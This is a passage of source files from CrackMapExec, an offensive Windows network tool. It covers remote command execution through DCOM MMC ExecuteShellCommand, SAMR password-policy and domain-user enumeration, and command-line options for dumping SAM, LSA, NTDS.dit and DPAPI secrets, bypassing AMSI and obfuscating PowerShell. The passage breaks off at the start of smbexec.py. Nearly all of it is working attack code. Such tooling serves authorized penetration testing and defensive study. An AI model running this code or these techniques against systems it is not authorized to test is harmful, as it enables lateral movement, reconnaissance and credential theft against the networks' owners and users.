dispParams["cNamedArgs"] = 0
resp = iMMC.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])
iDocument = IDispatch(self.getInterface(iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"]))
resp = iDocument.GetIDsOfNames(("ActiveView",))
resp = iDocument.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])
iActiveView = IDispatch(self.getInterface(iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"]))
pExecuteShellCommand = iActiveView.GetIDsOfNames(("ExecuteShellCommand",))[0]
pQuit = iMMC.GetIDsOfNames(("Quit",))[0]
self.__quit = (iMMC, pQuit)
self.__executeShellCommand = (iActiveView, pExecuteShellCommand)
def getInterface(self, interface, resp):
# Now let's parse the answer and build an Interface instance
objRefType = OBJREF(b"".join(resp))["flags"]
objRef = None
if objRefType == FLAGS_OBJREF_CUSTOM:
objRef = OBJREF_CUSTOM(b"".join(resp))
elif objRefType == FLAGS_OBJREF_HANDLER:
objRef = OBJREF_HANDLER(b"".join(resp))
elif objRefType == FLAGS_OBJREF_STANDARD:
objRef = OBJREF_STANDARD(b"".join(resp))
elif objRefType == FLAGS_OBJREF_EXTENDED:
objRef = OBJREF_EXTENDED(b"".join(resp))
else:
self.logger.fail("Unknown OBJREF Type! 0x%x" % objRefType)
return IRemUnknown2(
INTERFACE(
interface.get_cinstance(),
None,
interface.get_ipidRemUnknown(),
objRef["std"]["ipid"],
oxid=objRef["std"]["oxid"],
oid=objRef["std"]["oxid"],
target=interface.get_target(),
)
)
def execute(self, command, output=False):
self.__retOutput = output
self.execute_remote(command)
self.exit()
self.__dcom.disconnect()
return self.__outputBuffer
def exit(self):
try:
dispParams = DISPPARAMS(None, False)
dispParams["rgvarg"] = NULL
dispParams["rgdispidNamedArgs"] = NULL
dispParams["cArgs"] = 0
dispParams["cNamedArgs"] = 0
self.__quit[0].Invoke(self.__quit[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [])
except Exception as e:
self.logger.fail(f"Unexpect dcom error when doing exit() function in mmcexec: {str(e)}")
return True
def execute_remote(self, data):
self.__output = "\\Windows\\Temp\\" + gen_random_string(6)
command = self.__shell + " /Q /c " + data
if self.__retOutput is True:
command += " 1> " + f"{self.__output}" + " 2>&1"
dispParams = DISPPARAMS(None, False)
dispParams["rgdispidNamedArgs"] = NULL
dispParams["cArgs"] = 4
dispParams["cNamedArgs"] = 0
arg0 = VARIANT(None, False)
arg0["clSize"] = 5
arg0["vt"] = VARENUM.VT_BSTR
arg0["_varUnion"]["tag"] = VARENUM.VT_BSTR
arg0["_varUnion"]["bstrVal"]["asData"] = self.__shell
arg1 = VARIANT(None, False)
arg1["clSize"] = 5
arg1["vt"] = VARENUM.VT_BSTR
arg1["_varUnion"]["tag"] = VARENUM.VT_BSTR
arg1["_varUnion"]["bstrVal"]["asData"] = self.__pwd
arg2 = VARIANT(None, False)
arg2["clSize"] = 5
arg2["vt"] = VARENUM.VT_BSTR
arg2["_varUnion"]["tag"] = VARENUM.VT_BSTR
arg2["_varUnion"]["bstrVal"]["asData"] = command
arg3 = VARIANT(None, False)
arg3["clSize"] = 5
arg3["vt"] = VARENUM.VT_BSTR
arg3["_varUnion"]["tag"] = VARENUM.VT_BSTR
arg3["_varUnion"]["bstrVal"]["asData"] = "7"
dispParams["rgvarg"].append(arg3)
dispParams["rgvarg"].append(arg2)
dispParams["rgvarg"].append(arg1)
dispParams["rgvarg"].append(arg0)
self.__executeShellCommand[0].Invoke(self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [])
self.get_output_remote()
def output_callback(self, data):
self.__outputBuffer += data
def get_output_fileless(self):
if not self.__retOutput:
return
while True:
try:
with open(path_join("/tmp", "cme_hosted", self.__output), "r") as output:
self.output_callback(output.read())
break
except IOError:
sleep(2)
def get_output_remote(self):
if self.__retOutput is False:
self.__outputBuffer = ""
return
tries = 1
while True:
try:
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
break
except Exception as e:
if tries >= self.__tries:
self.logger.fail(f'MMCEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
break
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
self.logger.fail(f'MMCEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')
break
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
# Output not finished, let's wait
sleep(2)
tries += 1
else:
self.logger.debug(str(e))
if self.__outputBuffer:
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
self.__smbconnection.deleteFile(self.__share, self.__output)
================================================
FILE: cme/protocols/smb/passpol.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Stolen from https://github.com/Wh1t3Fox/polenum
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
from impacket.dcerpc.v5 import transport, samr
from time import strftime, gmtime
from cme.logger import cme_logger
def d2b(a):
tbin = []
while a:
tbin.append(a % 2)
a //= 2
t2bin = tbin[::-1]
if len(t2bin) != 8:
for x in range(6 - len(t2bin)):
t2bin.insert(0, 0)
return "".join([str(g) for g in t2bin])
def convert(low, high, lockout=False):
time = ""
tmp = 0
if low == 0 and hex(high) == "-0x80000000":
return "Not Set"
if low == 0 and high == 0:
return "None"
if not lockout:
if low != 0:
high = abs(high + 1)
else:
high = abs(high)
low = abs(low)
tmp = low + (high) * 16**8 # convert to 64bit int
tmp *= 1e-7 # convert to seconds
else:
tmp = abs(high) * (1e-7)
try:
minutes = int(strftime("%M", gmtime(tmp)))
hours = int(strftime("%H", gmtime(tmp)))
days = int(strftime("%j", gmtime(tmp))) - 1
except ValueError as e:
return "[-] Invalid TIME"
if days > 1:
time += f"{days} days "
elif days == 1:
time += f"{days} day "
if hours > 1:
time += f"{hours} hours "
elif hours == 1:
time += f"{hours} hour "
if minutes > 1:
time += f"{minutes} minutes "
elif minutes == 1:
time += f"{minutes} minute "
return time
class PassPolDump:
KNOWN_PROTOCOLS = {
"139/SMB": (r"ncacn_np:%s[\pipe\samr]", 139),
"445/SMB": (r"ncacn_np:%s[\pipe\samr]", 445),
}
def __init__(self, connection):
self.logger = connection.logger
self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
self.protocol = connection.args.port
self.username = connection.username
self.password = connection.password
self.domain = connection.domain
self.hash = connection.hash
self.lmhash = ""
self.nthash = ""
self.aesKey = connection.aesKey
self.doKerberos = connection.kerberos
self.protocols = PassPolDump.KNOWN_PROTOCOLS.keys()
self.pass_pol = {}
if self.hash is not None:
if self.hash.find(":") != -1:
self.lmhash, self.nthash = self.hash.split(":")
else:
self.nthash = self.hash
if self.password is None:
self.password = ""
def dump(self):
# Try all requested protocols until one works.
for protocol in self.protocols:
try:
protodef = PassPolDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
except KeyError:
cme_logger.debug(f"Invalid Protocol '{protocol}'")
cme_logger.debug(f"Trying protocol {protocol}")
rpctransport = transport.SMBTransport(
self.addr,
port,
r"\samr",
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
self.aesKey,
doKerberos=self.doKerberos,
)
try:
self.fetchList(rpctransport)
except Exception as e:
cme_logger.debug(f"Protocol failed: {e}")
else:
# Got a response. No need for further iterations.
self.pretty_print()
break
return self.pass_pol
def fetchList(self, rpctransport):
dce = DCERPC_v5(rpctransport)
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
# Setup Connection
resp = samr.hSamrConnect2(dce)
if resp["ErrorCode"] != 0:
raise Exception("Connect error")
resp2 = samr.hSamrEnumerateDomainsInSamServer(
dce,
serverHandle=resp["ServerHandle"],
enumerationContext=0,
preferedMaximumLength=500,
)
if resp2["ErrorCode"] != 0:
raise Exception("Connect error")
resp3 = samr.hSamrLookupDomainInSamServer(
dce,
serverHandle=resp["ServerHandle"],
name=resp2["Buffer"]["Buffer"][0]["Name"],
)
if resp3["ErrorCode"] != 0:
raise Exception("Connect error")
resp4 = samr.hSamrOpenDomain(
dce,
serverHandle=resp["ServerHandle"],
desiredAccess=samr.MAXIMUM_ALLOWED,
domainId=resp3["DomainId"],
)
if resp4["ErrorCode"] != 0:
raise Exception("Connect error")
self.__domains = resp2["Buffer"]["Buffer"]
domainHandle = resp4["DomainHandle"]
# End Setup
re = samr.hSamrQueryInformationDomain2(
dce,
domainHandle=domainHandle,
domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainPasswordInformation,
)
self.__min_pass_len = re["Buffer"]["Password"]["MinPasswordLength"] or "None"
self.__pass_hist_len = re["Buffer"]["Password"]["PasswordHistoryLength"] or "None"
self.__max_pass_age = convert(
int(re["Buffer"]["Password"]["MaxPasswordAge"]["LowPart"]),
int(re["Buffer"]["Password"]["MaxPasswordAge"]["HighPart"]),
)
self.__min_pass_age = convert(
int(re["Buffer"]["Password"]["MinPasswordAge"]["LowPart"]),
int(re["Buffer"]["Password"]["MinPasswordAge"]["HighPart"]),
)
self.__pass_prop = d2b(re["Buffer"]["Password"]["PasswordProperties"])
re = samr.hSamrQueryInformationDomain2(
dce,
domainHandle=domainHandle,
domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainLockoutInformation,
)
self.__rst_accnt_lock_counter = convert(0, re["Buffer"]["Lockout"]["LockoutObservationWindow"], lockout=True)
self.__lock_accnt_dur = convert(0, re["Buffer"]["Lockout"]["LockoutDuration"], lockout=True)
self.__accnt_lock_thres = re["Buffer"]["Lockout"]["LockoutThreshold"] or "None"
re = samr.hSamrQueryInformationDomain2(
dce,
domainHandle=domainHandle,
domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainLogoffInformation,
)
self.__force_logoff_time = convert(
re["Buffer"]["Logoff"]["ForceLogoff"]["LowPart"],
re["Buffer"]["Logoff"]["ForceLogoff"]["HighPart"],
)
self.pass_pol = {
"min_pass_len": self.__min_pass_len,
"pass_hist_len": self.__pass_hist_len,
"max_pass_age": self.__max_pass_age,
"min_pass_age": self.__min_pass_age,
"pass_prop": self.__pass_prop,
"rst_accnt_lock_counter": self.__rst_accnt_lock_counter,
"lock_accnt_dur": self.__lock_accnt_dur,
"accnt_lock_thres": self.__accnt_lock_thres,
"force_logoff_time": self.__force_logoff_time,
}
dce.disconnect()
def pretty_print(self):
PASSCOMPLEX = {
5: "Domain Password Complex:",
4: "Domain Password No Anon Change:",
3: "Domain Password No Clear Change:",
2: "Domain Password Lockout Admins:",
1: "Domain Password Store Cleartext:",
0: "Domain Refuse Password Change:",
}
cme_logger.debug("Found domain(s):")
for domain in self.__domains:
cme_logger.debug(f"{domain['Name']}")
self.logger.success(f"Dumping password info for domain: {self.__domains[0]['Name']}")
self.logger.highlight(f"Minimum password length: {self.__min_pass_len}")
self.logger.highlight(f"Password history length: {self.__pass_hist_len}")
self.logger.highlight(f"Maximum password age: {self.__max_pass_age}")
self.logger.highlight("")
self.logger.highlight(f"Password Complexity Flags: {self.__pass_prop or 'None'}")
for i, a in enumerate(self.__pass_prop):
self.logger.highlight(f"\t{PASSCOMPLEX[i]} {str(a)}")
self.logger.highlight("")
self.logger.highlight(f"Minimum password age: {self.__min_pass_age}")
self.logger.highlight(f"Reset Account Lockout Counter: {self.__rst_accnt_lock_counter}")
self.logger.highlight(f"Locked Account Duration: {self.__lock_accnt_dur}")
self.logger.highlight(f"Account Lockout Threshold: {self.__accnt_lock_thres}")
self.logger.highlight(f"Forced Log off Time: {self.__force_logoff_time}")
================================================
FILE: cme/protocols/smb/proto_args.py
================================================
def proto_args(parser, std_parser, module_parser):
smb_parser = parser.add_parser("smb", help="own stuff using SMB", parents=[std_parser, module_parser])
smb_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs="+", default=[],
help="NTLM hash(es) or file(s) containing NTLM hashes")
dgroup = smb_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action="store_true", help="authenticate locally to each target")
smb_parser.add_argument("--port", type=int, choices={445, 139}, default=445, help="SMB port (default: 445)")
smb_parser.add_argument("--share", metavar="SHARE", default="C$", help="specify a share (default: C$)")
smb_parser.add_argument("--smb-server-port", default="445", help="specify a server port for SMB", type=int)
smb_parser.add_argument("--gen-relay-list", metavar="OUTPUT_FILE",
help="outputs all hosts that don't require SMB signing to the specified file")
smb_parser.add_argument("--smb-timeout", help="SMB connection timeout, default 2 secondes", type=int, default=2)
smb_parser.add_argument("--laps", dest="laps", metavar="LAPS", type=str, help="LAPS authentification",
nargs="?", const="administrator")
cgroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
cgroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
cgroup.add_argument("--ntds", choices={"vss", "drsuapi"}, nargs="?", const="drsuapi",
help="dump the NTDS.dit from target DCs using the specifed method\n(default: drsuapi)")
cgroup.add_argument("--dpapi", choices={"cookies","nosystem"}, nargs="*",
help="dump DPAPI secrets from target systems, can dump cookies if you add \"cookies\", will not dump SYSTEM dpapi if you add nosystem\n")
# cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history')
# cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')
ngroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
ngroup.add_argument("--mkfile", action="store",
help="DPAPI option. File with masterkeys in form of {GUID}:SHA1")
ngroup.add_argument("--pvk", action="store", help="DPAPI option. File with domain backupkey")
ngroup.add_argument("--enabled", action="store_true", help="Only dump enabled targets from DC")
ngroup.add_argument("--user", dest="userntds", type=str, help="Dump selected user from DC")
egroup = smb_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")
egroup.add_argument("--shares", action="store_true", help="enumerate shares and access")
egroup.add_argument("--no-write-check", action="store_true", help="Skip write check on shares (avoid leaving traces when missing delete permissions)")
egroup.add_argument("--filter-shares", nargs="+",
help="Filter share by access, option 'read' 'write' or 'read,write'")
egroup.add_argument("--sessions", action="store_true", help="enumerate active sessions")
egroup.add_argument("--disks", action="store_true", help="enumerate disks")
egroup.add_argument("--loggedon-users-filter", action="store",
help="only search for specific user, works with regex")
egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users")
egroup.add_argument("--users", nargs="?", const="", metavar="USER",
help="enumerate domain users, if a user is specified than only its information is queried.")
egroup.add_argument("--groups", nargs="?", const="", metavar="GROUP",
help="enumerate domain groups, if a group is specified than its members are enumerated")
egroup.add_argument("--computers", nargs="?", const="", metavar="COMPUTER", help="enumerate computer users")
egroup.add_argument("--local-groups", nargs="?", const="", metavar="GROUP",
help="enumerate local groups, if a group is specified then its members are enumerated")
egroup.add_argument("--pass-pol", action="store_true", help="dump password policy")
egroup.add_argument("--rid-brute", nargs="?", type=int, const=4000, metavar="MAX_RID",
help="enumerate users by bruteforcing RID's (default: 4000)")
egroup.add_argument("--wmi", metavar="QUERY", type=str, help="issues the specified WMI query")
egroup.add_argument("--wmi-namespace", metavar="NAMESPACE", default="root\\cimv2",
help="WMI Namespace (default: root\\cimv2)")
sgroup = smb_parser.add_argument_group("Spidering", 'Options for spidering shares')
sgroup.add_argument("--spider", metavar="SHARE", type=str, help="share to spider")
sgroup.add_argument("--spider-folder", metavar="FOLDER", default=".", type=str,
help="folder to spider (default: root share directory)")
sgroup.add_argument("--content", action="store_true", help="enable file content searching")
sgroup.add_argument("--exclude-dirs", type=str, metavar="DIR_LIST", default="",
help="directories to exclude from spidering")
segroup = sgroup.add_mutually_exclusive_group()
segroup.add_argument("--pattern", nargs="+",
help="pattern(s) to search for in folders, filenames and file content")
segroup.add_argument("--regex", nargs="+", help="regex(s) to search for in folders, filenames and file content")
sgroup.add_argument("--depth", type=int, default=None,
help="max spider recursion depth (default: infinity & beyond)")
sgroup.add_argument("--only-files", action="store_true", help="only spider files")
tgroup = smb_parser.add_argument_group("Files", "Options for put and get remote files")
tgroup.add_argument("--put-file", nargs=2, metavar="FILE", help="Put a local file into remote target, ex: whoami.txt \\\\Windows\\\\Temp\\\\whoami.txt")
tgroup.add_argument("--get-file", nargs=2, metavar="FILE", help="Get a remote file, ex: \\\\Windows\\\\Temp\\\\whoami.txt whoami.txt")
tgroup.add_argument("--append-host", action="store_true", help="append the host to the get-file filename")
cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default=None,
help="method to execute the command. Ignored if in MSSQL mode (default: wmiexec)")
cgroup.add_argument("--dcom-timeout", help="DCOM connection timeout, default is 5 secondes", type=int, default=5)
cgroup.add_argument("--get-output-tries", help="Number of times atexec/smbexec/mmcexec tries to get results, default is 5", type=int, default=5)
cgroup.add_argument("--codec", default="utf-8",
help="Set encoding used (codec) from the target's output (default "
"\"utf-8\"). If errors are detected, run chcp.com at the target, "
"map the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings and then execute "
"again with --codec and the corresponding codec")
cgroup.add_argument("--force-ps32", action="store_true",
help="force the PowerShell command to run in a 32-bit process")
cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output")
cegroup = cgroup.add_mutually_exclusive_group()
cegroup.add_argument("-x", metavar="COMMAND", dest="execute", help="execute the specified command")
cegroup.add_argument("-X", metavar="PS_COMMAND", dest="ps_execute", help="execute the specified PowerShell command")
psgroup = smb_parser.add_argument_group("Powershell Obfuscation", "Options for PowerShell script obfuscation")
psgroup.add_argument("--obfs", action="store_true", help="Obfuscate PowerShell scripts")
psgroup.add_argument('--amsi-bypass', nargs=1, metavar="FILE", help='File with a custom AMSI bypass')
psgroup.add_argument("--clear-obfscripts", action="store_true", help="Clear all cached obfuscated PowerShell scripts")
return parser
================================================
FILE: cme/protocols/smb/remotefile.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.smb3structs import FILE_READ_DATA, FILE_WRITE_DATA
class RemoteFile:
def __init__(
self,
smbConnection,
fileName,
share="ADMIN$",
access=FILE_READ_DATA | FILE_WRITE_DATA,
):
self.__smbConnection = smbConnection
self.__share = share
self.__access = access
self.__fileName = fileName
self.__tid = self.__smbConnection.connectTree(share)
self.__fid = None
self.__currentOffset = 0
def open(self):
self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName, desiredAccess=self.__access)
def seek(self, offset, whence):
# Implement whence, for now it's always from the beginning of the file
if whence == 0:
self.__currentOffset = offset
def read(self, bytesToRead):
if bytesToRead > 0:
data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
self.__currentOffset += len(data)
return data
return ""
def close(self):
if self.__fid is not None:
self.__smbConnection.closeFile(self.__tid, self.__fid)
self.__fid = None
def delete(self):
self.__smbConnection.deleteFile(self.__share, self.__fileName)
def tell(self):
return self.__currentOffset
def __str__(self):
return f"\\\\{self.__smbConnection.getRemoteHost()}\\{self.__share}\\{self.__fileName}"
================================================
FILE: cme/protocols/smb/samrfunc.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Majorly stolen from https://gist.github.com/ropnop/7a41da7aabb8455d0898db362335e139
# Which in turn stole from Impacket :)
# Code refactored and added to by @mjhallenbeck (Marshall-Hallenbeck on GitHub)
import logging
from impacket.dcerpc.v5 import transport, lsat, lsad, samr
from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.nmb import NetBIOSError
from impacket.smbconnection import SessionError
from cme.logger import cme_logger
class SamrFunc:
def __init__(self, connection):
self.logger = connection.logger
self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
self.protocol = connection.args.port
self.username = connection.username
self.password = connection.password
self.domain = connection.domain
self.hash = connection.hash
self.lmhash = ""
self.nthash = ""
self.aesKey = connection.aesKey
self.doKerberos = connection.kerberos
if self.hash is not None:
if self.hash.find(":") != -1:
self.lmhash, self.nthash = self.hash.split(":")
else:
self.nthash = self.hash
if self.password is None:
self.password = ""
self.samr_query = SAMRQuery(
username=self.username,
password=self.password,
domain=self.domain,
remote_name=self.addr,
remote_host=self.addr,
kerberos=self.doKerberos,
aesKey=self.aesKey,
)
self.lsa_query = LSAQuery(
username=self.username,
password=self.password,
domain=self.domain,
remote_name=self.addr,
remote_host=self.addr,
kerberos=self.doKerberos,
aesKey=self.aesKey,
logger=self.logger
)
def get_builtin_groups(self):
domains = self.samr_query.get_domains()
if "Builtin" not in domains:
logging.error(f"No Builtin group to query locally on")
return
domain_handle = self.samr_query.get_domain_handle("Builtin")
groups = self.samr_query.get_domain_aliases(domain_handle)
return groups
def get_custom_groups(self):
domains = self.samr_query.get_domains()
custom_groups = {}
for domain in domains:
if domain == "Builtin":
continue
domain_handle = self.samr_query.get_domain_handle(domain)
custom_groups.update(self.samr_query.get_domain_aliases(domain_handle))
return custom_groups
def get_local_groups(self):
builtin_groups = self.get_builtin_groups()
custom_groups = self.get_custom_groups()
return {**builtin_groups, **custom_groups}
def get_local_users(self):
pass
def get_local_administrators(self):
self.get_builtin_groups()
if "Administrators" in self.groups:
self.logger.success(f"Found Local Administrators group: RID {self.groups['Administrators']}")
domain_handle = self.samr_query.get_domain_handle("Builtin")
self.logger.debug(f"Querying group members")
member_sids = self.samr_query.get_alias_members(domain_handle, self.groups["Administrators"])
member_names = self.lsa_query.lookup_sids(member_sids)
for sid, name in zip(member_sids, member_names):
print(f"{name} - {sid}")
class SAMRQuery:
def __init__(
self,
username="",
password="",
domain="",
port=445,
remote_name="",
remote_host="",
kerberos=None,
aesKey="",
):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ""
self.__nthash = ""
self.__aesKey = aesKey
self.__port = port
self.__remote_name = remote_name
self.__remote_host = remote_host
self.__kerberos = kerberos
self.dce = self.get_dce()
self.server_handle = self.get_server_handle()
def get_transport(self):
string_binding = f"ncacn_np:{self.__port}[\pipe\samr]"
cme_logger.debug(f"Binding to {string_binding}")
# using a direct SMBTransport instead of DCERPCTransportFactory since we need the filename to be '\samr'
rpc_transport = transport.SMBTransport(
self.__remote_host,
self.__port,
r"\samr",
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
doKerberos=self.__kerberos,
)
return rpc_transport
def get_dce(self):
rpc_transport = self.get_transport()
try:
dce = rpc_transport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
except NetBIOSError as e:
logging.error(f"NetBIOSError on Connection: {e}")
return
except SessionError as e:
logging.error(f"SessionError on Connection: {e}")
return
return dce
def get_server_handle(self):
if self.dce:
try:
resp = samr.hSamrConnect(self.dce)
except samr.DCERPCException as e:
cme_logger.debug(f"Error while connecting with Samr: {e}")
return None
return resp["ServerHandle"]
else:
cme_logger.debug(f"Error creating Samr handle")
return
def get_domains(self):
resp = samr.hSamrEnumerateDomainsInSamServer(self.dce, self.server_handle)
domains = resp["Buffer"]["Buffer"]
domain_names = []
for domain in domains:
domain_names.append(domain["Name"])
return domain_names
def get_domain_handle(self, domain_name):
resp = samr.hSamrLookupDomainInSamServer(self.dce, self.server_handle, domain_name)
resp = samr.hSamrOpenDomain(self.dce, serverHandle=self.server_handle, domainId=resp["DomainId"])
return resp["DomainHandle"]
def get_domain_aliases(self, domain_handle):
resp = samr.hSamrEnumerateAliasesInDomain(self.dce, domain_handle)
aliases = {}
for alias in resp["Buffer"]["Buffer"]:
aliases[alias["Name"]] = alias["RelativeId"]
return aliases
def get_alias_handle(self, domain_handle, alias_id):
resp = samr.hSamrOpenAlias(self.dce, domain_handle, desiredAccess=MAXIMUM_ALLOWED, aliasId=alias_id)
return resp["AliasHandle"]
def get_alias_members(self, domain_handle, alias_id):
alias_handle = self.get_alias_handle(domain_handle, alias_id)
resp = samr.hSamrGetMembersInAlias(self.dce, alias_handle)
member_sids = []
for member in resp["Members"]["Sids"]:
member_sids.append(member["SidPointer"].formatCanonical())
return member_sids
class LSAQuery:
def __init__(
self,
username="",
password="",
domain="",
port=445,
remote_name="",
remote_host="",
aesKey="",
kerberos=None,
logger=None
):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ""
self.__nthash = ""
self.__aesKey = aesKey
self.__port = port
self.__remote_name = remote_name
self.__remote_host = remote_host
self.__kerberos = kerberos
self.dce = self.get_dce()
self.policy_handle = self.get_policy_handle()
self.logger = logger
def get_transport(self):
string_binding = f"ncacn_np:{self.__remote_name}[\\pipe\\lsarpc]"
rpc_transport = transport.DCERPCTransportFactory(string_binding)
rpc_transport.set_dport(self.__port)
rpc_transport.setRemoteHost(self.__remote_host)
if self.__kerberos:
rpc_transport.set_kerberos(True, None)
if hasattr(rpc_transport, "set_credentials"):
# This method exists only for selected protocol sequences.
rpc_transport.set_credentials(
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
)
return rpc_transport
def get_dce(self):
rpc_transport = self.get_transport()
try:
dce = rpc_transport.get_dce_rpc()
if self.__kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
dce.bind(lsat.MSRPC_UUID_LSAT)
except NetBIOSError as e:
self.logger.fail(f"NetBIOSError on Connection: {e}")
return None
return dce
def get_policy_handle(self):
resp = lsad.hLsarOpenPolicy2(self.dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
return resp["PolicyHandle"]
def lookup_sids(self, sids):
resp = lsat.hLsarLookupSids(self.dce, self.policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
names = []
for translated_names in resp["TranslatedNames"]["Names"]:
names.append(translated_names["Name"])
return names
================================================
FILE: cme/protocols/smb/samruser.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Stolen from Impacket
from impacket.dcerpc.v5 import transport, samr
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
from impacket.nt_errors import STATUS_MORE_ENTRIES
class UserSamrDump:
KNOWN_PROTOCOLS = {
"139/SMB": (r"ncacn_np:%s[\pipe\samr]", 139),
"445/SMB": (r"ncacn_np:%s[\pipe\samr]", 445),
}
def __init__(self, connection):
self.logger = connection.logger
self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
self.protocol = connection.args.port
self.username = connection.username
self.password = connection.password
self.domain = connection.domain
self.hash = connection.hash
self.lmhash = ""
self.nthash = ""
self.aesKey = connection.aesKey
self.doKerberos = connection.kerberos
self.protocols = UserSamrDump.KNOWN_PROTOCOLS.keys()
self.users = []
if self.hash is not None:
if self.hash.find(":") != -1:
self.lmhash, self.nthash = self.hash.split(":")
else:
self.nthash = self.hash
if self.password is None:
self.password = ""
def dump(self):
# Try all requested protocols until one works.
for protocol in self.protocols:
try:
protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
except KeyError as e:
self.logger.debug(f"Invalid Protocol '{protocol}'")
self.logger.debug(f"Trying protocol {protocol}")
rpctransport = transport.SMBTransport(
self.addr,
port,
r"\samr",
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
self.aesKey,
doKerberos=self.doKerberos,
)
try:
self.fetchList(rpctransport)
break
except Exception as e:
self.logger.debug(f"Protocol failed: {e}")
return self.users
def fetchList(self, rpctransport):
dce = DCERPC_v5(rpctransport)
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
# Setup Connection
resp = samr.hSamrConnect2(dce)
if resp["ErrorCode"] != 0:
raise Exception("Connect error")
resp2 = samr.hSamrEnumerateDomainsInSamServer(
dce,
serverHandle=resp["ServerHandle"],
enumerationContext=0,
preferedMaximumLength=500,
)
if resp2["ErrorCode"] != 0:
raise Exception("Connect error")
resp3 = samr.hSamrLookupDomainInSamServer(
dce,
serverHandle=resp["ServerHandle"],
name=resp2["Buffer"]["Buffer"][0]["Name"],
)
if resp3["ErrorCode"] != 0:
raise Exception("Connect error")
resp4 = samr.hSamrOpenDomain(
dce,
serverHandle=resp["ServerHandle"],
desiredAccess=samr.MAXIMUM_ALLOWED,
domainId=resp3["DomainId"],
)
if resp4["ErrorCode"] != 0:
raise Exception("Connect error")
self.__domains = resp2["Buffer"]["Buffer"]
domainHandle = resp4["DomainHandle"]
# End Setup
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0:
self.logger.fail("Error enumerating domain user(s)")
break
resp = e.get_packet()
self.logger.success("Enumerated domain user(s)")
for user in resp["Buffer"]["Buffer"]:
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"])
info = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation)
(username, uid, info_user) = (
user["Name"],
user["RelativeId"],
info["Buffer"]["All"],
)
self.logger.highlight(f"{self.domain}\\{user['Name']:<30} {info_user['AdminComment']}")
self.users.append(user["Name"])
samr.hSamrCloseHandle(dce, r["UserHandle"])
enumerationContext = resp["EnumerationContext"]
status = resp["ErrorCode"]
dce.disconnect()
================================================
FILE: cme/protocols/smb/smbexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from os.path import join as path_join
from time import sleep
